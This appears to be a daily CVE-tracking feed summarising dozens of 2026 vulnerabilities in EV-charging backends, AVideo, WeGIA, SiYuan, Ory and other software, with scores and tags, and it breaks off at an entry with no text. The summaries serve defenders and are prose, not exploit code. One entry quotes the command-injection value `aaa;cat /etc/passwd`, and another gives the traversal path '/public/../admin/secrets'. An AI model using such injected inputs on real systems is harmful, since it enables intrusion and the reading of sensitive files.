283 CVEs tracked today. 26 Critical, 135 High, 101 Medium, 17 Low.
-
CVE-2026-29796
CRITICAL
CVSS 9.4
Unauthenticated access to OCPP WebSocket endpoints allows remote attackers to impersonate legitimate charging stations and execute arbitrary commands against electric vehicle charging infrastructure without credentials. An attacker can connect using a known station identifier to manipulate charging operations, alter backend data, and escalate privileges across the charging network. No patch is currently available for this critical vulnerability affecting EV charging systems.
Authentication Bypass
Privilege Escalation
-
CVE-2026-25192
CRITICAL
CVSS 9.4
Unauthenticated access to OCPP WebSocket endpoints allows remote attackers to impersonate legitimate charging stations and execute arbitrary commands against EV charging infrastructure without credentials. By connecting with a known station identifier, threat actors can manipulate charging operations, escalate privileges, and corrupt backend network data. No patch is currently available for this critical vulnerability affecting charging station deployments.
Authentication Bypass
Privilege Escalation
-
CVE-2026-24060
CRITICAL
CVSS 9.1
This vulnerability affects Automated Logic's WebCTRL Premium Server, which transmits BACnet protocol data in cleartext without encryption. An attacker positioned on the network can sniff sensitive service information including File Start Position, File Data, and proprietary PLC update formats using tools like Wireshark, enabling both information disclosure and potential integrity attacks through modification of intercepted traffic. With a CVSS score of 9.1 (Critical) and network-based attack vector requiring no privileges or user interaction, this represents a significant exposure for building automation systems.
Information Disclosure
-
CVE-2026-33502
CRITICAL
CVSS 9.3
An unauthenticated server-side request forgery (SSRF) vulnerability exists in AVideo's Live plugin test.php endpoint that allows remote attackers to force the server to send HTTP requests to arbitrary URLs. The vulnerability affects AVideo installations with the Live plugin enabled and can be exploited to probe internal network services, access cloud metadata endpoints, and retrieve content from internal HTTP resources. A proof-of-concept has been published demonstrating localhost service enumeration, and the vulnerability requires no authentication or user interaction to exploit.
SSRF
PHP
RCE
Apache
Nginx
-
CVE-2026-33494
CRITICAL
CVSS 10.0
Ory Oathkeeper, an identity and access proxy, contains an authorization bypass vulnerability via HTTP path traversal that allows attackers to access protected resources without authentication. The vulnerability affects Ory Oathkeeper installations where the software uses un-normalized paths for rule matching, enabling requests like '/public/../admin/secrets' to bypass authentication requirements. With a CVSS score of 10.0 (Critical) and network-based exploitation requiring no privileges or user interaction, this represents a severe authentication bypass, though the absence of a current EPSS score or KEV listing indicates limited evidence of active exploitation at this time.
Path Traversal
Nginx
-
CVE-2026-33478
CRITICAL
CVSS 10.0
A critical authentication bypass and command injection vulnerability chain in AVideo's CloneSite plugin allows completely unauthenticated remote attackers to achieve full system compromise. The vulnerability affects AVideo installations with the CloneSite plugin enabled, allowing attackers to steal clone authentication keys, dump the entire database including MD5-hashed admin credentials, crack those credentials trivially, and finally execute arbitrary system commands via an rsync command injection. A detailed proof-of-concept demonstrating the complete attack chain is publicly available in the GitHub security advisory, making this an immediate exploitation risk.
RCE
Command Injection
PHP
-
CVE-2026-33419
CRITICAL
CVSS 9.1
MinIO AIStor's Security Token Service (STS) AssumeRoleWithLDAPIdentity endpoint contains two combined vulnerabilities that enable LDAP credential brute-forcing: distinguishable error messages allowing username enumeration (CWE-204) and missing rate limiting (CWE-307). All MinIO deployments through the final open-source release with LDAP authentication enabled are affected. Unauthenticated network attackers can enumerate valid LDAP usernames, perform unlimited password guessing attacks, and obtain temporary AWS-style STS credentials granting full access to victim users' S3 buckets and objects.
Microsoft
Docker
Information Disclosure
Apple
Nginx
-
CVE-2026-33286
CRITICAL
CVSS 9.1
A critical arbitrary method execution vulnerability affects Graphiti's JSONAPI write functionality, allowing attackers to invoke any public method on underlying model instances, classes, or associations through crafted JSONAPI payloads. Applications using Graphiti (a Ruby gem for building JSON:API compliant APIs) that expose write endpoints to untrusted users are affected, particularly versions prior to 1.10.2. The vulnerability scores CVSS 9.1 (Critical) with network-based exploitation requiring no authentication or user interaction, enabling both high integrity and availability impacts.
Information Disclosure
-
CVE-2026-33136
CRITICAL
CVSS 9.3
WeGIA, a web manager for charitable institutions, contains a Reflected Cross-Site Scripting (XSS) vulnerability in the listar_memorandos_ativos.php endpoint affecting versions 3.6.6 and below. An attacker can inject arbitrary JavaScript or HTML into the sccd GET parameter, which is reflected without sanitization when the msg parameter equals 'success', enabling session hijacking, credential theft, and malicious actions in the context of victim users. The vulnerability has a critical CVSS score of 9.3 with changed scope, indicating potential impact beyond the vulnerable component.
XSS
PHP
-
CVE-2026-33135
CRITICAL
CVSS 9.3
A Reflected Cross-Site Scripting (XSS) vulnerability exists in WeGIA, a web manager for charitable institutions. Versions 3.6.6 and below are affected through the novo_memorandoo.php endpoint, where an attacker can inject arbitrary JavaScript via the sccs GET parameter without sanitization. This allows execution of malicious scripts in victims' browsers when they click a crafted link, with a critical CVSS score of 9.3 due to cross-site scripting scope and high confidentiality and integrity impact.
XSS
PHP
-
CVE-2026-33134
CRITICAL
CVSS 9.3
WeGIA, a web manager for charitable institutions, contains an authenticated SQL injection vulnerability in versions 3.6.5 and below via the id_producto parameter in the restaurar_produto.php endpoint. An authenticated attacker can execute arbitrary SQL commands to fully compromise the database, extracting sensitive donor information, beneficiary records, and administrative credentials. No evidence of active exploitation (not in CISA KEV) is currently available, though proof-of-concept details are publicly disclosed in the GitHub security advisory.
SQLi
PHP
-
CVE-2026-33024
CRITICAL
CVSS 9.1
AVideo, a video-sharing platform, contains a Server-Side Request Forgery (SSRF) vulnerability in versions prior to 8.0 affecting the public thumbnail endpoints getImage.php and getImageMP4.php. Unauthenticated attackers can exploit insufficient URL validation to force the server to make requests to internal network resources including cloud metadata endpoints (AWS EC2 169.254.169.254), localhost, and private IP ranges. The vulnerability has a CVSS 4.0 score of 9.3 with network attack vector requiring no privileges or user interaction, though there is no evidence of active exploitation or public proof-of-concept at this time.
SSRF
PHP
-
CVE-2026-32985
CRITICAL
CVSS 9.8
Xerte Online Toolkits 3.14 and earlier contain an unauthenticated arbitrary file upload vulnerability allowing remote code execution with a CVSS score of 9.8. The template import functionality at /website_code/php/import/import.php lacks authentication checks, enabling attackers to upload ZIP archives containing malicious PHP files that are extracted to web-accessible directories. This is a critical severity issue with network-based attack vector requiring no privileges or user interaction, and a proof-of-concept has been published by VulnCheck.
PHP
Authentication Bypass
RCE
File Upload
-
CVE-2026-32945
CRITICAL
CVSS 9.8
Heap overflow in PJSIP 2.16 and earlier DNS parser allows unauthenticated remote attackers to achieve code execution with no user interaction required. The vulnerability affects only applications explicitly configured with a built-in nameserver; users relying on OS resolvers or external resolver implementations are unaffected. No patch is currently available, but mitigation is possible by disabling DNS resolution or switching to an external resolver.
Buffer Overflow
Heap Overflow
-
CVE-2026-32940
CRITICAL
CVSS 9.3
SiYuan personal knowledge management system contains a cross-site scripting (XSS) vulnerability in versions 3.6.0 and below. An unauthenticated attacker can exploit the /api/icon/getDynamicIcon endpoint by crafting a malicious URL that bypasses SVG sanitization filters, allowing arbitrary JavaScript execution when a victim clicks an injected link within the rendered SVG. The CVSS score of 9.3 indicates critical severity, though exploitation requires user interaction (clicking a malicious link) and the attack complexity is low.
XSS
-
CVE-2026-32938
CRITICAL
CVSS 9.9
SiYuan personal knowledge management system versions 3.6.0 and below contain a path traversal vulnerability that allows authenticated attackers to exfiltrate arbitrary readable files from the system. An attacker with low-level privileges can exploit the /api/lute/html2BlockDOM endpoint to copy sensitive files to the workspace assets directory via malicious file:// links in pasted HTML, then retrieve them through the authenticated GET /assets/ endpoint. This is a critical vulnerability with a CVSS score of 9.9 due to its potential for high confidentiality impact and scope change, though no active exploitation (KEV) or public proof-of-concept has been documented.
Path Traversal
-
CVE-2026-32891
CRITICAL
CVSS 9.0
A stored cross-site scripting (XSS) vulnerability in Anchorr Discord bot versions 1.4.1 and below allows authenticated Jellyseerr users to execute arbitrary JavaScript in admin browser sessions. The XSS payload can exfiltrate the full application configuration including session tokens and API keys for integrated services (Jellyfin, Jellyseerr, Discord), enabling complete account takeover across all connected platforms without requiring admin credentials. This vulnerability is tagged as XSS in ENISA's database (EUVD-2026-13503) with a CVSS score of 9.0, though no EPSS score, KEV listing, or public POC availability has been reported at this time.
XSS
-
CVE-2026-32890
CRITICAL
CVSS 9.6
A stored Cross-site Scripting (XSS) vulnerability exists in the Anchorr Discord bot's web dashboard User Mapping dropdown that allows any unprivileged Discord user in the configured guild to execute arbitrary JavaScript in an administrator's browser. This can be chained with an unauthenticated API endpoint (/api/config) to exfiltrate all stored credentials including Discord tokens, Jellyfin API keys, Jellyseerr API keys, JWT secrets, webhook secrets, and bcrypt password hashes. The vulnerability affects Anchorr versions 1.4.1 and below, with a critical CVSS score of 9.6 indicating network-based exploitation with low complexity and no authentication required.
XSS
-
CVE-2026-32817
CRITICAL
CVSS 9.1
Admidio versions 5.0.0 through 5.0.6 contain a critical authorization bypass vulnerability in the documents and files module that allows unauthorized deletion of folders and files. When the module is configured in public mode, unauthenticated attackers can permanently destroy the entire document library via simple HTTP GET requests without CSRF protection. The vulnerability combines missing authorization checks (CWE-862) with CSRF weaknesses, resulting in a CVSS score of 9.1 (Critical) with network-based attack vector requiring no privileges or user interaction.
CSRF
PHP
Authentication Bypass
-
CVE-2026-32666
HIGH
CVSS 7.5
WebCTRL Premium Server systems contain an authentication bypass vulnerability arising from BACnet protocol's inherent lack of network layer authentication, compounded by WebCTRL's failure to implement additional validation. An attacker with network access can spoof BACnet packets targeting either the WebCTRL server or associated Automated Logic controllers, which will process the spoofed packets as legitimate traffic. This vulnerability has a CVSS score of 7.5 with high integrity impact and is disclosed through ICS-CERT advisory ICSA-26-078-08.
Authentication Bypass
-
CVE-2026-32663
HIGH
CVSS 7.3
A session management vulnerability exists in the WebSocket backend of IGL Technologies' eparking.fi platform that allows multiple endpoints to connect using the same charging station identifier. An unauthenticated remote attacker can hijack legitimate charging station sessions by connecting with predictable session identifiers, enabling them to intercept backend commands, authenticate as other users, or cause denial-of-service by overwhelming the backend with concurrent session requests. This vulnerability affects operational technology (OT) infrastructure and has been disclosed by CISA ICS-CERT.
Authentication Bypass
-
CVE-2026-31904
HIGH
CVSS 7.5
The CTEK ChargePortal WebSocket API contains a critical rate limiting vulnerability that permits unlimited authentication attempts. This flaw enables attackers to either launch denial-of-service attacks by overwhelming the system with authentication requests that suppress legitimate charger telemetry data, or conduct brute-force attacks to compromise user credentials and gain unauthorized system access. With a CVSS score of 7.5 and network-based attack vector requiring no privileges, this poses significant risk to electric vehicle charging infrastructure operators.
Authentication Bypass
-
CVE-2026-31903
HIGH
CVSS 7.5
The WebSocket API in iGL Technologies' eparking.fi platform lacks rate limiting on authentication requests, enabling attackers to conduct brute-force attacks to gain unauthorized access or launch denial-of-service attacks that suppress or mis-route legitimate electric vehicle charger telemetry data. This vulnerability affects internet-accessible systems with no authentication required and low attack complexity (CVSS 7.5). There is no current evidence of active exploitation (not in CISA KEV) or public proof-of-concept code, though the issue has been disclosed through CISA ICS-CERT advisory ICSA-26-078-08.
Authentication Bypass
-
CVE-2026-27649
HIGH
CVSS 7.3
A session management vulnerability in CTEK ChargePortal's WebSocket backend allows attackers to hijack charging station sessions by connecting with the same predictable session identifier used by legitimate stations. This enables authentication bypass, interception of backend commands intended for legitimate charging stations, and denial-of-service through session flooding. The vulnerability affects CTEK ChargePortal with a CVSS score of 7.3 and is documented in ICS-CERT advisory ICSA-26-078-06, though no active exploitation (KEV) or public POC has been reported.
Authentication Bypass
-
CVE-2026-25086
HIGH
CVSS 7.7
WebCTRL Premium Server contains a port binding vulnerability that allows an attacker with local access to bind to the same network port used by the WebCTRL service. This enables the attacker to send malicious packets and impersonate the legitimate WebCTRL service without injecting code into the application, potentially compromising confidentiality and integrity of building automation system communications. The vulnerability affects Automated Logic's WebCTRL Premium Server and has been disclosed by ICS-CERT, though no KEV listing or public POC is currently documented.
Code Injection
-
CVE-2026-22898
CRITICAL
CVSS 9.3
QVR Pro contains a missing authentication vulnerability (CWE-306) that allows remote attackers to access critical functions without proper credential validation, potentially gaining unauthorized system access. All versions prior to QVR Pro 2.7.4.14 are affected. This authentication bypass vulnerability enables unauthenticated remote exploitation of a surveillance management platform, representing a direct threat to organizations relying on QVR Pro for video recording and system administration.
Qnap
Authentication Bypass
Qvr Pro
-
CVE-2026-22172
CRITICAL
CVSS 9.9
OpenClaw contains an authorization bypass vulnerability in its WebSocket connection handling that allows authenticated users with low-privilege shared-token or password credentials to falsely declare elevated administrative scopes without proper server-side validation. Attackers with basic authentication can escalate privileges to operator.admin level and execute administrative gateway operations. With a CVSS score of 9.9 (Critical) and low attack complexity, this represents a severe privilege escalation risk, though no KEV listing or EPSS data is currently available to confirm active exploitation.
Authentication Bypass
-
CVE-2026-21992
CRITICAL
CVSS 9.8
A critical authentication bypass vulnerability in Oracle Identity Manager and Oracle Web Services Manager allows remote attackers to completely compromise affected systems without any credentials. The vulnerability resides in the REST WebServices and Web Services Security components, affecting versions 12.2.1.4.0 and 14.1.2.1.0 of both products. With a CVSS score of 9.8 and no authentication required, this represents a severe risk to identity management infrastructure, though no current KEV listing or public POC has been documented in available sources.
Oracle
Authentication Bypass
-
CVE-2026-21732
CRITICAL
CVSS 9.6
GPU shader compiler memory corruption via malicious shader code allows remote code execution when the compiler runs with elevated privileges, affecting multiple platforms through crafted switch statements that trigger out-of-bounds writes. An attacker can exploit this vulnerability by delivering specially-crafted GPU shader code through a web page, potentially gaining system-level control on vulnerable devices. No patch is currently available for this critical vulnerability.
Buffer Overflow
Memory Corruption
-
CVE-2026-4038
CRITICAL
CVSS 9.8
The Aimogen Pro plugin for WordPress contains an arbitrary function call vulnerability allowing unauthenticated attackers to execute privileged WordPress functions without authorization. All versions up to and including 2.7.5 are affected, enabling attackers to modify critical site settings such as changing the default user registration role to administrator, then registering as an admin to gain full site control. This is a critical authentication bypass with privilege escalation rated 9.8 CVSS, though no active exploitation (KEV) or public proof-of-concept has been reported at this time.
WordPress
Privilege Escalation
Authentication Bypass
-
CVE-2026-3584
CRITICAL
CVSS 9.8
The Kali Forms plugin for WordPress contains a critical remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary code on the server. All versions up to and including 2.4.9 are affected, including the popular 'Kali Forms - Contact Form & Drag-and-Drop Builder' plugin by WPChill. The vulnerability carries a critical CVSS score of 9.8 due to its network-based attack vector, low complexity, and lack of required authentication or user interaction.
WordPress
RCE
Code Injection
-
CVE-2024-44722
CRITICAL
CVSS 9.8
SysAK v2.0 and before is vulnerable to command execution via the input `aaa;cat /etc/passwd`. Rated critical severity (CVSS 9.8), this vulnerability is remotely exploitable, requires no authentication, and has low attack complexity. No vendor patch is available.
Code Injection
RCE
-
CVE-2026-33509
HIGH
CVSS 7.5
Remote code execution in Python allows authenticated users with SETTINGS permission to modify the reconnect.script configuration parameter without restriction, which is then passed unsanitized to subprocess.run() enabling arbitrary command execution. The vulnerability exists due to insufficient input validation in the set_config_value() API endpoint, which only restricts the general.storage_folder setting while leaving other security-critical options like reconnect.script unprotected. An attacker with non-admin SETTINGS privileges can exploit this to achieve full system compromise on the affected Python installation.
Python
RCE
Privilege Escalation
-
CVE-2026-33508
HIGH
CVSS 8.2
Parse Server's LiveQuery component fails to enforce query depth limits on WebSocket subscription requests, allowing attackers to send deeply nested logical operators that trigger excessive recursion and CPU consumption. This affects Parse Server deployments where the LiveQuery WebSocket endpoint is accessible to untrusted clients (pkg:npm/parse-server). A patch is available from the vendor with no known workarounds, and while no EPSS score or KEV listing is present, the availability of proof-of-concept code in the patch references suggests exploitation details are publicly documented.
Information Disclosure
-
CVE-2026-33507
HIGH
CVSS 8.8
A Cross-Site Request Forgery (CSRF) vulnerability in the AVideo platform's plugin upload endpoint allows unauthenticated attackers to achieve Remote Code Execution by tricking authenticated administrators into visiting a malicious webpage. The vulnerability combines missing CSRF token validation on the pluginImport.json.php endpoint with explicitly configured SameSite=None session cookies over HTTPS, enabling cross-origin session hijacking. A proof-of-concept exploit has been published demonstrating full compromise by uploading a malicious plugin containing a PHP webshell.
PHP
RCE
CSRF
Command Injection
Path Traversal
-
CVE-2026-33505
HIGH
CVSS 7.2
Ory Keto, an open-source authorization service, contains a SQL injection vulnerability in its GetRelationships API due to insecure pagination token handling. Attackers who know or can exploit the default hard-coded pagination encryption secret can craft malicious tokens to execute arbitrary SQL queries. The CVSS score of 7.2 reflects high privileges required (PR:H), though the actual risk is elevated when default secrets remain unchanged in production deployments.
SQLi
OpenSSL
-
CVE-2026-33504
HIGH
CVSS 7.2
Ory Hydra, an OAuth 2.0 and OpenID Connect provider, contains a SQL injection vulnerability in three admin APIs (listOAuth2Clients, listOAuth2ConsentSessions, listTrustedOAuth2JwtGrantIssuers) due to insecure pagination token handling. Attackers who know the pagination secret can craft malicious encrypted tokens to execute arbitrary SQL queries. The CVSS score of 7.2 requires high privileges (PR:H), but successful exploitation grants full database access with high confidentiality, integrity, and availability impact.
SQLi
OpenSSL
-
CVE-2026-33503
HIGH
CVSS 7.2
Ory Kratos, an open-source identity and user management system, contains a SQL injection vulnerability in its ListCourierMessages Admin API through malicious pagination tokens. Attackers who know or can exploit the default pagination encryption secret can craft tokens to execute arbitrary SQL queries against the backend database. The vulnerability requires high privileges (PR:H) but is network-exploitable (AV:N) with low complexity (AC:L), scoring CVSS 7.2.
SQLi
OpenSSL
-
CVE-2026-33498
HIGH
CVSS 8.7
Parse Server is vulnerable to a permanent denial-of-service attack that bypasses the previous CVE-2026-32944 fix. An unauthenticated attacker can send a specially crafted HTTP request containing deeply nested query structures with logical operators to permanently hang the Parse Server process, requiring manual restart. This affects parse-server npm package installations, and patches are available from the vendor.
Authentication Bypass
-
CVE-2026-33497
HIGH
CVSS 7.5
Path traversal in Langflow's /profile_pictures endpoint allows unauthenticated remote attackers to read the application's secret_key through directory traversal in the folder_name parameter. Since the secret_key is used for JWT authentication, attackers can forge valid tokens to gain unauthorized system access. Public exploit code exists for this vulnerability and no patch is currently available.
Path Traversal
-
CVE-2026-33496
HIGH
CVSS 8.1
Ory Oathkeeper contains a cache key confusion vulnerability in its oauth2_introspection authenticator that allows attackers to bypass authentication by reusing tokens across different introspection servers. Attackers with a valid token for one configured introspection server can exploit the cache mechanism to gain unauthorized access to resources protected by different introspection servers. This vulnerability requires the specific precondition of multiple oauth2_introspection authenticators with caching enabled, and a patch is available from the vendor.
Authentication Bypass
-
CVE-2026-33493
HIGH
CVSS 7.1
The AVideo platform contains a path traversal vulnerability in the objects/import.json.php endpoint that allows authenticated users with upload permissions to bypass directory restrictions and access any MP4 file on the filesystem. Attackers can steal private videos from other users, read adjacent text/HTML files containing video metadata, and delete video files if writable by the web server. A detailed proof-of-concept is publicly available in the GitHub security advisory, and the vulnerability affects all instances where authenticated users have upload permissions, which is the default configuration.
Path Traversal
PHP
-
CVE-2026-33492
HIGH
CVSS 7.3
AVideo, an open-source video platform, contains a session fixation vulnerability that allows attackers to hijack user sessions and achieve full account takeover. The flaw affects the AVideo Composer package (pkg:composer/wwbn_avideo) and stems from accepting arbitrary session IDs via URL parameters, bypassing session regeneration for specific endpoints, and disabled session regeneration during login. A public proof-of-concept exploit is available in the GitHub security advisory, and the vulnerability requires only low privileges (authenticated attacker) and user interaction (victim clicking a malicious link), making it highly exploitable.
Session Fixation
PHP
CSRF
Privilege Escalation
-
CVE-2026-33488
HIGH
CVSS 7.4
The LoginControl plugin for AVideo contains a critical cryptographic weakness in its PGP-based 2FA implementation, generating 512-bit RSA keys that can be factored on commodity hardware within hours using publicly available tools. Attackers who obtain a user's public key can derive the complete private key and decrypt authentication challenges, completely bypassing the second factor protection. A proof-of-concept demonstrating key factoring and challenge decryption is included in the advisory, and unauthenticated endpoints allow anonymous CPU-intensive key generation for denial-of-service attacks.
PHP
Denial Of Service
Python
-
CVE-2026-33485
HIGH
CVSS 7.5
An unauthenticated SQL injection vulnerability exists in the AVideo platform's RTMP on_publish callback, allowing remote attackers to extract the entire database via time-based blind SQL injection. The vulnerability affects the wwbn_avideo composer package and can be exploited without authentication to steal user password hashes, email addresses, and API keys. A detailed proof-of-concept is publicly available in the GitHub Security Advisory, and the vulnerability has a CVSS score of 7.5 (High) with network attack vector and low complexity.
SQLi
PHP
Information Disclosure
-
CVE-2026-33484
HIGH
CVSS 7.5
The Langflow Python package contains an authentication bypass vulnerability in its image file download endpoint that allows unauthenticated attackers to access image files uploaded by any user. Langflow, a visual framework for building AI applications, fails to enforce authentication and ownership checks on the /api/v1/files/images/{flow_id}/{file_name} endpoint, while all other file operation endpoints properly implement these security controls. A proof-of-concept exploit exists demonstrating that any attacker with knowledge of a flow UUID and filename can retrieve sensitive image data without credentials, posing a critical risk in multi-tenant deployments where cross-tenant data leakage can occur.
Authentication Bypass
-
CVE-2026-33483
HIGH
CVSS 7.5
AVideo platform contains an unauthenticated file upload vulnerability in the aVideoEncoderChunk.json.php endpoint that allows remote attackers to exhaust disk space and cause denial of service. Any unauthenticated attacker can upload arbitrarily large files to the server's /tmp directory with no size limits, rate limiting, or cleanup mechanism, and the CORS wildcard header enables browser-based distributed attacks. A detailed proof-of-concept is publicly available demonstrating parallel upload attacks that can fill disk space and crash server services.
Denial Of Service
Information Disclosure
PHP
-
CVE-2026-33482
HIGH
CVSS 8.1
Remote code execution in PHP ffmpeg integration allows unauthenticated attackers to execute arbitrary OS commands on standalone encoder servers by bypassing incomplete input sanitization that fails to filter bash command substitution syntax. The vulnerable `sanitizeFFmpegCommand()` function strips common shell metacharacters but permits `$()` notation, which can be injected through crafted encrypted payloads and executed in a double-quoted shell context. No patch is currently available.
RCE
PHP
Command Injection
-
CVE-2026-33480
HIGH
CVSS 8.6
AVideo, an open-source video platform, contains a server-side request forgery (SSRF) vulnerability that allows unauthenticated attackers to bypass URL validation using IPv4-mapped IPv6 addresses (::ffff:x.x.x.x format). The vulnerable endpoint plugin/LiveLinks/proxy.php can be exploited to access cloud metadata services (AWS, GCP, Azure), internal networks, and localhost services without authentication. A detailed proof-of-concept is publicly available demonstrating credential theft from AWS instance metadata, making this a critical risk for cloud-hosted installations.
SSRF
PHP
Microsoft
Redis
-
CVE-2026-33479
HIGH
CVSS 8.8
The Gallery plugin in AVideo contains an unauthenticated remote code execution vulnerability through CSRF-enabled PHP code injection. Attackers can exploit an eval() function that directly executes unsanitized user input by tricking an admin into visiting a malicious page, with the session cookie's SameSite=None configuration enabling cross-site request forgery. A detailed proof-of-concept exploit exists demonstrating command execution through crafted form submissions.
PHP
RCE
CSRF
Code Injection
-
CVE-2026-33476
HIGH
CVSS 7.5
An unauthenticated directory traversal vulnerability exists in SiYuan kernel's /appearance/ endpoint, allowing remote attackers to read arbitrary files accessible to the server process without authentication. The vulnerability affects the Go-based SiYuan note-taking application (github.com/siyuan-note/siyuan/kernel) and has been assigned a CVSS score of 7.5 (High). A working proof-of-concept exploit is publicly available demonstrating successful file retrieval via crafted URLs containing path traversal sequences, and a patch has been released by the vendor.
Information Disclosure
Authentication Bypass
Path Traversal
Microsoft
Docker
-
CVE-2026-33468
HIGH
CVSS 8.1
Kysely, a TypeScript SQL query builder for Node.js, contains a SQL injection vulnerability in its MySQL dialect due to incomplete string escaping in the DefaultQueryCompiler.sanitizeStringLiteral() method. Applications using kysely (npm package) with MySQL that pass user-controlled input to CreateIndexBuilder.where() or CreateViewBuilder.as() methods are vulnerable to SQL injection attacks that can lead to data exfiltration, modification, or authentication bypass. A proof-of-concept exploit is publicly available demonstrating how backslash-escaped single quotes bypass the sanitization logic when NO_BACKSLASH_ESCAPES is disabled (MySQL default).
SQLi
Authentication Bypass
-
CVE-2026-33442
HIGH
CVSS 8.1
SQL injection in PostgreSQL via unsafe backslash handling in Kysely's query compiler allows unauthenticated remote attackers to execute arbitrary SQL commands by injecting backslashes into JSON path string literals that bypass quote escaping. The vulnerability affects systems using the default BACKSLASH_ESCAPES SQL mode, where attackers can break out of sanitized JSON path expressions through specially crafted input. No patch is currently available.
SQLi
PostgreSQL
-
CVE-2026-33427
HIGH
CVSS 7.5
Discourse versions prior to 2026.3.0-latest.1, 2026.2.1, and 2026.1.2 contain an authorization page spoofing vulnerability that allows unauthenticated attackers to inject attacker-controlled domains into legitimate Discourse authorization pages, enabling social engineering attacks. This CWE-862 (Missing Authorization) class vulnerability requires no authentication or special privileges to exploit. No active exploitation in the wild (KEV status) has been reported, but the attack surface is broad given Discourse's widespread use as an open-source discussion platform.
Authentication Bypass
-
CVE-2026-33421
HIGH
CVSS 7.1
Parse Server's LiveQuery WebSocket interface contains an authorization bypass vulnerability that allows any authenticated user to subscribe to real-time object updates regardless of Class-Level Permission pointer field restrictions. Affected products include the parse-server npm package, where authenticated attackers can receive real-time updates for all objects in classes that should be restricted by readUserFields and pointerFields CLP settings, bypassing intended access controls that are correctly enforced in the REST API. No public proof-of-concept or active exploitation (KEV) has been reported at this time.
Information Disclosure
Authentication Bypass
-
CVE-2026-33418
HIGH
CVSS 7.5
A regex-based bypass vulnerability in the @dicebear/converter npm package allows attackers to circumvent SVG dimension sanitization by injecting decoy <svg tags in XML constructs. Applications using @dicebear/converter on Node.js to process untrusted SVG input are vulnerable to denial of service through unbounded memory allocation when rendering malformed SVGs. The CVSS score of 7.5 reflects the high availability impact with network-accessible attack vector requiring no authentication or user interaction.
Denial Of Service
Node.js
-
CVE-2026-33413
HIGH
CVSS 8.8
This is an authentication and authorization bypass vulnerability in etcd's gRPC API layer that allows unauthorized users to execute privileged operations when etcd auth is enabled. Affected are etcd versions prior to 3.4.42, 3.5.28, and 3.6.9 (specifically the Go packages go.etcd.io/etcd/v3 and go.etcd.io/etcd). Attackers can enumerate cluster topology via MemberList, trigger denial of service through Alarm APIs, manipulate Lease operations affecting TTL-based keys, and force compaction to permanently delete historical data. Standard Kubernetes deployments are not affected as they do not rely on etcd's built-in authentication. No EPSS score or KEV listing is currently available, and the vulnerability was responsibly disclosed by multiple security researchers.
Kubernetes
Denial Of Service
Authentication Bypass
-
CVE-2026-33331
HIGH
CVSS 8.2
A Stored Cross-Site Scripting (XSS) vulnerability exists in the orpc OpenAPI documentation generation functionality, affecting the @orpc/openapi npm package. Attackers who can control OpenAPI specification fields (such as info.description) can inject malicious JavaScript that executes when users view the generated API documentation. A working proof-of-concept exists demonstrating payload injection through specification metadata fields. The CVSS score is 8.2 (High), and the network-accessible attack vector with no privileges required raises the real-world risk for any deployment that renders documentation from specifications it does not fully control.
XSS
-
CVE-2026-33316
HIGH
CVSS 8.1
Vikunja task management application contains an authentication bypass vulnerability in its password reset logic that allows disabled user accounts to be reactivated without authorization. The ResetPassword() function unconditionally sets user status to 'Active' after password reset completion, enabling disabled users to regain full access by requesting a password reset token and completing the reset process. A working proof-of-concept Python script is publicly available demonstrating automated exploitation of this vulnerability.
Python
Authentication Bypass
-
CVE-2026-33289
HIGH
CVSS 8.8
An LDAP injection vulnerability in SuiteCRM's authentication flow allows attackers to manipulate LDAP queries by injecting control characters into user-supplied input, potentially leading to authentication bypass or information disclosure. The vulnerability affects SuiteCRM versions prior to 7.15.1 and 8.9.3, which are open-source CRM systems widely deployed in enterprise environments. While no active exploitation has been reported (not in CISA KEV), the network-exploitable nature and potential for authentication bypass makes this a serious concern for organizations using affected versions.
Authentication Bypass
Information Disclosure
Ldap
Code Injection
-
CVE-2026-33288
HIGH
CVSS 8.8
SQL injection in SuiteCRM's authentication layer when directory support is enabled allows authenticated attackers with low-privilege directory credentials to execute arbitrary SQL commands and escalate privileges to administrator level. The vulnerability stems from insufficient input sanitization of usernames in local database queries. SuiteCRM versions prior to 7.15.1 and 8.9.3 are affected; those releases are the ones to upgrade to.
Privilege Escalation
SQLi
-
CVE-2026-33243
HIGH
CVSS 8.2
A signature bypass vulnerability exists in the barebox bootloader's FIT (Flattened Image Tree) image verification mechanism. The hashed-nodes property, which lists which FIT nodes were signed, is not itself part of the cryptographic hash, allowing an attacker with high privileges and local access to modify this property and trick the bootloader into loading malicious images that were never signed. This affects barebox versions 2016.03.0 through 2025.09.2 and 2025.10.0 through 2026.03.0, with patches available in versions 2025.09.3 and 2026.03.1.
Information Disclosure
-
CVE-2026-33164
HIGH
CVSS 7.5
A malformed H.265 PPS (Picture Parameter Set) NAL unit in libde265 prior to version 1.0.17 triggers a segmentation fault in the pic_parameter_set::set_derived_values() function, causing denial of service. Any application using affected versions of libde265 to decode H.265 video streams is vulnerable to crash via specially crafted video files or streams. The vulnerability has been patched in version 1.0.17, and a GitHub security advisory documents the issue.
Buffer Overflow
Heap Overflow
-
CVE-2026-33156
HIGH
CVSS 7.8
ScreenToGif, a widely-used screen recording application, is vulnerable to DLL sideloading attacks through a malicious version.dll file. Versions 2.42.1 and earlier are affected when the portable executable is run from user-writable directories, which is the primary intended use case for this application. Attackers can achieve arbitrary code execution in the user's context with high impact on confidentiality, integrity, and availability. No public patches are available at the time of disclosure, and no evidence of active exploitation (KEV status) has been reported.
RCE
Microsoft
Windows
-
CVE-2026-33150
HIGH
CVSS 7.8
libfuse versions 3.18.0 through 3.18.1 contain a use-after-free vulnerability in the io_uring subsystem that allows local attackers to crash FUSE filesystem processes or execute arbitrary code when thread creation fails under resource constraints. The flaw occurs when io_uring initialization fails (e.g., due to cgroup limits), leaving a dangling pointer in session state that is dereferenced during shutdown. Public exploit code exists for this vulnerability, and no patch is currently available.
Memory Corruption
RCE
Denial Of Service
Use After Free
-
CVE-2026-33147
HIGH
CVSS 7.3
Stack-based buffer overflow in GMT versions 6.6.0 and earlier allows local attackers to crash the application or execute arbitrary code by supplying an excessively long dataset identifier to vulnerable functions like gmt_remote_dataset_id. The vulnerability affects command-line processing of geographic data and currently lacks a public patch, leaving all affected GMT installations exposed to local exploitation.
Stack Overflow
Buffer Overflow
RCE
-
CVE-2026-33133
HIGH
CVSS 7.2
